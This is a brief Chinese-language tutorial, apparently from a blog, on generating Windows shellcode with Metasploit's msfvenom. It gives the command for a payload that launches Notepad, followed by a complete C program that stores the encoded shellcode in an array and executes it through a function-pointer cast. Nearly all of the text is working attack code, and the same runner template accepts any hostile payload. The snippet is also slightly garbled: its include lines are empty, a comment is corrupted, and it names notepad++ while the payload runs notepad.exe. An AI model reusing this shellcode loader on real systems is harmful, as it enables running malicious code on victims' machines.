Metasploit
shellcode生成————kali工具
查看帮助:msfvenom -h
例如:msfvenom -p windows/exec cmd=notepad.exe -b'\x00' -f c
生成执行notepad++的c语言shellcode‘\x00’表示为了避免遇到00终止
完整代码如下:
#include#include unsigned char shellcode[] = "\xdb\xc7\xbd\x4f\x8f\x20\x88\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x32\x83\xea\xfc\x31\x6a\x13\x03\x25\x9c\xc2\x7d\x45\x4a\x80" "\x7e\xb5\x8b\xe5\xf7\x50\xba\x25\x63\x11\xed\x95\xe7\x77\x02" "\x5d\xa5\x63\x91\x13\x62\x84\x12\x99\x54\xab\xa3\xb2\xa5\xaa" "\x27\xc9\xf9\x0c\x19\x02\x0c\x4d\x5e\x7f\xfd\x1f\x37\x0b\x50" "\x8f\x3c\x41\x69\x24\x0e\x47\xe9\xd9\xc7\x66\xd8\x4c\x53\x31" "\xfa\x6f\xb0\x49\xb3\x77\xd5\x74\x0d\x0c\x2d\x02\x8c\xc4\x7f" "\xeb\x23\x29\xb0\x1e\x3d\x6e\x77\xc1\x48\x86\x8b\x7c\x4b\x5d" "\xf1\x5a\xde\x45\x51\x28\x78\xa1\x63\xfd\x1f\x22\x6f\x4a\x6b" "\x6c\x6c\x4d\xb8\x07\x88\xc6\x3f\xc7\x18\x9c\x1b\xc3\x41\x46" "\x05\x52\x2c\x29\x3a\x84\x8f\x96\x9e\xcf\x22\xc2\x92\x92\x28" "\x15\x20\xa9\x1f\x15\x3a\xb1\x0f\x7e\x0b\x3a\xc0\xf9\x94\xe9" "\xa4\xf6\xde\xb3\x8d\x9e\x86\x26\x8c\xc2\x38\x9d\xd3\xfa\xba" "\x17\xac\xf8\xa3\x52\xa9\x45\x64\x8f\xc3\xd6\x01\xaf\x70\xd6" "\x03\xc1\x19\x5c\xc9\x6d\x87\xf8\x3f\xe8\x3f\x64\x40"; void RunShellCode_1() { ((void(*)(void))&shellcode)(); } void main() { RunShellCode_1(); //´ò¿ª¼Çʱ¾ }